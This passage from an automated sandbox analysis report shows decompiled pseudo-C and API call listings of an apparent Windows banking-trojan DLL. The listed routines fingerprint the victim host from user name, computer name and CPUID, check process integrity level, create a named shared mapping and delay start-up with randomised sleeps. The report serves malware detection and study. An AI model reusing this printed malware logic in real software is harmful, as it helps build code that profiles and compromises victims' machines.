                                                            • Part of subcall function 04958D14: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0495523E), ref: 04958E12
                                                          • GetLastError.KERNEL32 ref: 0495533D
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                          • String ID:
                                                          • API String ID: 3521023985-0
                                                          • Opcode ID: d1920438d8f7b73d3cb15b577f6a6940ee44fb3c5721a53d5458f9cf0d3081a3
                                                          • Instruction ID: 5625325a934624ef33ce8c49c563fe2d76feb8870e60f181be2b5dc86891e2ef
                                                          • Opcode Fuzzy Hash: d1920438d8f7b73d3cb15b577f6a6940ee44fb3c5721a53d5458f9cf0d3081a3
                                                          • Instruction Fuzzy Hash: 74513A71805228BBDF11EF95EC449EEBFBDEF49720F304625E815A2169D774AA40CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0495232F, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E0495232F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L0495AF28();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x495d2a8; // 0x47a5a8
				_t5 = _t13 + 0x495e87e; // 0x4dd8e26
				_t6 = _t13 + 0x495e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L0495ABCA();
				_t17 = CreateFileMappingW(0xffffffff, 0x495d2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                          0x0495232f
                                                          0x04952337
                                                          0x0495233b
                                                          0x04952341
                                                          0x04952346
                                                          0x0495234b
                                                          0x0495234e
                                                          0x04952351
                                                          0x04952356
                                                          0x04952357
                                                          0x0495235a
                                                          0x0495235f
                                                          0x04952366
                                                          0x04952370
                                                          0x04952372
                                                          0x04952373
                                                          0x04952376
                                                          0x04952392
                                                          0x04952398
                                                          0x0495239c
                                                          0x049523ea
                                                          0x0495239e
                                                          0x049523ab
                                                          0x049523bb
                                                          0x049523c3
                                                          0x049523d5
                                                          0x049523d9
                                                          0x00000000
                                                          0x00000000
                                                          0x049523c5
                                                          0x049523c8
                                                          0x049523cd
                                                          0x049523cf
                                                          0x049523cf
                                                          0x049523ad
                                                          0x049523af
                                                          0x049523db
                                                          0x049523dc
                                                          0x049523dc
                                                          0x049523ab
                                                          0x049523f1

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04955C31,?,?,4D283A53,?,?), ref: 0495233B
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04952351
                                                          • _snwprintf.NTDLL ref: 04952376
                                                          • CreateFileMappingW.KERNELBASE(000000FF,0495D2AC,00000004,00000000,00001000,?), ref: 04952392
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04955C31,?,?,4D283A53), ref: 049523A4
                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 049523BB
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04955C31,?,?), ref: 049523DC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04955C31,?,?,4D283A53), ref: 049523E4
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: b079927a57814241d7bcac0f965d52e684c24e4da49740db5e693de673697b83
                                                          • Instruction ID: 96f6ab870377e47cac669db58b88dbf70e9d5e6dfb73eedf58f385fb5f695a2e
                                                          • Opcode Fuzzy Hash: b079927a57814241d7bcac0f965d52e684c24e4da49740db5e693de673697b83
                                                          • Instruction Fuzzy Hash: 2B21C072644304BBDB11EF64DC45F8E3BAEEB88B40F344171FA05EB1A0E6B0A904CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04959135, Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E04959135(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x495d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E0495A6CC( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x495d2a4 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x495d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E04957306(_v8 + _v8, _t64);
							}
							HeapFree( *0x495d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x495d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04957306(_v8 + _v8, _t64);
						}
						HeapFree( *0x495d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                                          0x04959135
                                                          0x0495913d
                                                          0x04959141
                                                          0x04959144
                                                          0x04959149
                                                          0x0495914b
                                                          0x04959150
                                                          0x04959150
                                                          0x04959156
                                                          0x04959158
                                                          0x04959165
                                                          0x049591c6
                                                          0x04959167
                                                          0x0495916c
                                                          0x04959172
                                                          0x04959177
                                                          0x04959185
                                                          0x04959189
                                                          0x04959198
                                                          0x0495919f
                                                          0x049591a6
                                                          0x049591a6
                                                          0x049591b1
                                                          0x049591b1
                                                          0x04959189
                                                          0x04959177
                                                          0x049591c8
                                                          0x049591ce
                                                          0x049591d8
                                                          0x049591da
                                                          0x049591df
                                                          0x049591ee
                                                          0x049591f2
                                                          0x049591fd
                                                          0x04959204
                                                          0x0495920b
                                                          0x0495920b
                                                          0x04959217
                                                          0x04959217
                                                          0x049591f2
                                                          0x04959222
                                                          0x04959224
                                                          0x04959227
                                                          0x04959229
                                                          0x0495922c
                                                          0x0495922f
                                                          0x04959239
                                                          0x0495923d
                                                          0x04959241

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0495916C
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04959183
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04959190
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04955D20), ref: 049591B1
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 049591D8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 049591EC
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 049591F9
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04955D20), ref: 04959217
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID:
                                                          • API String ID: 3239747167-0
                                                          • Opcode ID: aa14d587b5793b2552fe6dbb83d4b8933e7abdc44c86466c592b17cf99a1b17a
                                                          • Instruction ID: 39054f7a5d3a44e84d09a1bd0d0705f29d8fa58c7b06ec92bc6250b425ec1d6c
                                                          • Opcode Fuzzy Hash: aa14d587b5793b2552fe6dbb83d4b8933e7abdc44c86466c592b17cf99a1b17a
                                                          • Instruction Fuzzy Hash: EE3109B1A04205EFEB10DFA9ED84A6EBBFDEF44214F218579E905D7220DB34EE019B10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04951A08, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04951A08(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x495d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E0495A71F(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E0495A734(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                          0x04951a15
                                                          0x04951a1c
                                                          0x04951a23
                                                          0x04951a37
                                                          0x04951a42
                                                          0x04951a5a
                                                          0x04951a67
                                                          0x04951a6a
                                                          0x04951a6f
                                                          0x04951a7a
                                                          0x04951a7e
                                                          0x04951a8d
                                                          0x04951a91
                                                          0x04951aad
                                                          0x04951aad
                                                          0x04951ab1
                                                          0x04951ab1
                                                          0x04951ab6
                                                          0x04951aba
                                                          0x04951ac0
                                                          0x04951ac1
                                                          0x04951ac8
                                                          0x04951ace

                                                          APIs
                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04951A3A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04951A5A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04951A6A
                                                          • CloseHandle.KERNEL32(00000000), ref: 04951ABA
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04951A8D
                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04951A95
                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04951AA5
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                          • String ID:
                                                          • API String ID: 1295030180-0
                                                          • Opcode ID: 9184a917385717594650fd69e942b75e344fa0ba234f5909988e50385e68d4c9
                                                          • Instruction ID: c2ce83ea9e65c250bc8f34dd194fb0b545c425d6bcc4f7687f8a0f1f566802ff
                                                          • Opcode Fuzzy Hash: 9184a917385717594650fd69e942b75e344fa0ba234f5909988e50385e68d4c9
                                                          • Instruction Fuzzy Hash: 06211975900249FFEB01DFA4DC84EAEBBBDEB44304F204266E910A6160D7759A45DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0495391F, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(?), ref: 0495395A
                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 049539DD
                                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 04953A1D
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04953A3F
                                                            • Part of subcall function 04956F3A: SysAllocString.OLEAUT32(0495C290), ref: 04956F8A
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 04953A92
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04953AA1
                                                            • Part of subcall function 04951AE2: Sleep.KERNELBASE(000001F4), ref: 04951B2A
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                          • String ID:
                                                          • API String ID: 2118684380-0
                                                          • Opcode ID: e603d9d6e32c6b6888f5eb8244fa04e71ce3de07697aadb233a8985e84b52551
                                                          • Instruction ID: ba644b042d48fce19c1c97d22393387efe0f3ba4ae4675d7f3b5c4d0dbd1aeb5
                                                          • Opcode Fuzzy Hash: e603d9d6e32c6b6888f5eb8244fa04e71ce3de07697aadb233a8985e84b52551
                                                          • Instruction Fuzzy Hash: AA513C76500609AFDB11DFA8C844A9AB7BAFFC8744F248539ED05EB220EB75ED05CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 049512E5, Relevance: 9.1, APIs: 6, Instructions: 60sleepmemorytimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E049512E5(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x495d238 = _t10;
				if(_t10 != 0) {
					 *0x495d1a8 = GetTickCount();
					_t12 = E04953E69(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L0495B08A();
							_t33 = _t14 + _t16;
							_t18 = E04955548(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E04954DA2(_t25) != 0) {
							 *0x495d260 = 1; // executed
						}
						_t12 = E04955BA2(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                          0x049512e5
                                                          0x049512eb
                                                          0x049512ec
                                                          0x049512f8
                                                          0x049512fe
                                                          0x04951305
                                                          0x04951315
                                                          0x0495131a
                                                          0x04951321
                                                          0x04951323
                                                          0x04951328
                                                          0x0495132e
                                                          0x04951334
                                                          0x0495133e
                                                          0x04951342
                                                          0x04951344
                                                          0x04951349
                                                          0x0495134a
                                                          0x0495134b
                                                          0x04951350
                                                          0x04951356
                                                          0x0495135f
                                                          0x04951360
                                                          0x04951365
                                                          0x0495136b
                                                          0x04951377
                                                          0x04951379
                                                          0x04951379
                                                          0x04951383
                                                          0x04951383
                                                          0x04951307
                                                          0x04951309
                                                          0x04951309
                                                          0x0495138d

                                                          APIs
                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04954EF2,?), ref: 049512F8
                                                          • GetTickCount.KERNEL32 ref: 0495130C
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04954EF2,?), ref: 04951328
                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,04954EF2,?), ref: 0495132E
                                                          • _aullrem.NTDLL(?,?,00000009,00000000), ref: 0495134B
                                                          • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,04954EF2,?), ref: 04951365
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                          • String ID:
                                                          • API String ID: 507476733-0
                                                          • Opcode ID: 17b81040bca7075d17abb97e16e3d2a481bc715e3aab9efaf1b409ca9ff8d2f5
                                                          • Instruction ID: 8f335aadecc51205f94c45963eace5c2f59e5b73e18aa50bf9381040870995ec
                                                          • Opcode Fuzzy Hash: 17b81040bca7075d17abb97e16e3d2a481bc715e3aab9efaf1b409ca9ff8d2f5
                                                          • Instruction Fuzzy Hash: 14117072A48301BBEB10EB74EC1AB5A7A9CDB84264F204635FD45D62A0EA74E8408761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04955BA2, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 57%
                                                          			E04955BA2(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04956C09();
				if(_t21 != 0) {
					_t59 =  *0x495d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x495d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x495d160(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E0495496B( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x495d2a8; // 0x47a5a8
					if( *0x495d25c > 5) {
						_t8 = _t26 + 0x495e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x495e9f5; // 0x44283a44
						_t27 = _t7;
					}
					E0495729A(_t27, _t27);
					_t31 = E0495232F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x495d270 =  *0x495d270 ^ 0x81bbe65d;
						_t32 = E0495A71F(0x60);
						 *0x495d32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x495d32c; // 0x4dd95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x495d32c; // 0x4dd95b0
							 *_t51 = 0x495e81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x495d238, 0, 0x43);
							 *0x495d2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x495d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x495d2a8; // 0x47a5a8
								_t13 = _t58 + 0x495e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x495c287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E04959135( ~_v8 &  *0x495d270,  &E0495D00C); // executed
								_t54 = E0495888E(_t55);
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E049587AE(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E049551B0(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E04951C66(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x495d15c();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E0495A273(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}






























                                                          0x04955ba2
                                                          0x04955bad
                                                          0x04955bb0
                                                          0x04955bb3
                                                          0x04955bb6
                                                          0x04955bbd
                                                          0x04955bbf
                                                          0x04955bcb
                                                          0x04955bcd
                                                          0x04955bcd
                                                          0x04955bd6
                                                          0x04955bdc
                                                          0x04955be1
                                                          0x04955bfb
                                                          0x04955c07
                                                          0x04955c09
                                                          0x04955c0e
                                                          0x04955c18
                                                          0x04955c18
                                                          0x04955c10
                                                          0x04955c10
                                                          0x04955c10
                                                          0x04955c10
                                                          0x04955c1f
                                                          0x04955c2c
                                                          0x04955c33
                                                          0x04955c38
                                                          0x04955c38
                                                          0x04955c40
                                                          0x04955c43
                                                          0x04955c69
                                                          0x04955c75
                                                          0x04955c7a
                                                          0x04955c7f
                                                          0x04955c81
                                                          0x04955cad
                                                          0x04955caf
                                                          0x04955c83
                                                          0x04955c87
                                                          0x04955c8c
                                                          0x04955c91
                                                          0x04955c98
                                                          0x04955c9e
                                                          0x04955ca3
                                                          0x04955ca9
                                                          0x04955cb0
                                                          0x04955cb2
                                                          0x04955cb4
                                                          0x04955cc3
                                                          0x04955cc9
                                                          0x04955cce
                                                          0x04955cd0
                                                          0x04955d00
                                                          0x04955d02
                                                          0x04955cd2
                                                          0x04955cd2
                                                          0x04955cd8
                                                          0x04955ce5
                                                          0x04955ceb
                                                          0x04955ceb
                                                          0x04955cf3
                                                          0x04955cfc
                                                          0x04955d03
                                                          0x04955d05
                                                          0x04955d07
                                                          0x04955d0e
                                                          0x04955d1b
                                                          0x04955d25
                                                          0x04955d27
                                                          0x04955d29
                                                          0x00000000
                                                          0x00000000
                                                          0x04955d2b
                                                          0x04955d30
                                                          0x04955d32
                                                          0x04955d39
                                                          0x04955d3d
                                                          0x04955d40
                                                          0x04955d55
                                                          0x04955d59
                                                          0x04955d5e
                                                          0x00000000
                                                          0x04955d5e
                                                          0x04955d42
                                                          0x04955d44
                                                          0x00000000
                                                          0x00000000
                                                          0x04955d4f
                                                          0x04955d51
                                                          0x04955d53
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04955d53
                                                          0x04955d36
                                                          0x04955d36
                                                          0x04955d07
                                                          0x04955c45
                                                          0x04955c45
                                                          0x04955c4a
                                                          0x04955d60
                                                          0x04955d64
                                                          0x04955d6c
                                                          0x04955d6c
                                                          0x00000000
                                                          0x04955d64
                                                          0x04955c50
                                                          0x04955c53
                                                          0x04955c5d
                                                          0x04955c64
                                                          0x00000000
                                                          0x04955d74
                                                          0x04955d74
                                                          0x04955d78
                                                          0x04955d7c
                                                          0x04955d7c

                                                          APIs
                                                            • Part of subcall function 04956C09: GetModuleHandleA.KERNEL32(4C44544E,00000000,04955BBB,00000000,00000000), ref: 04956C18
                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04955C38
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • memset.NTDLL ref: 04955C87
                                                          • RtlInitializeCriticalSection.NTDLL(04DD9570), ref: 04955C98
                                                            • Part of subcall function 04951C66: memset.NTDLL ref: 04951C7B
                                                            • Part of subcall function 04951C66: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04951CBD
                                                            • Part of subcall function 04951C66: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 04951CC8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04955CC3
                                                          • wsprintfA.USER32 ref: 04955CF3
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 4246211962-0
                                                          • Opcode ID: ff3d167f9547a1935b4af93a453108b1b2b0758142ccc706d8d53d2ca577b999
                                                          • Instruction ID: 38a12ab579e33c87b7b6e05ef0bf1a1098c881c27bbc4efe7c0401b26de9f288
                                                          • Opcode Fuzzy Hash: ff3d167f9547a1935b4af93a453108b1b2b0758142ccc706d8d53d2ca577b999
                                                          • Instruction Fuzzy Hash: CE51F472A04314BBEB21EBA0E848F5E7BBCEB44724F358535ED01D7166E678B941CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 049562DA, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 22%
                                                          			E049562DA(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E0495A71F(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
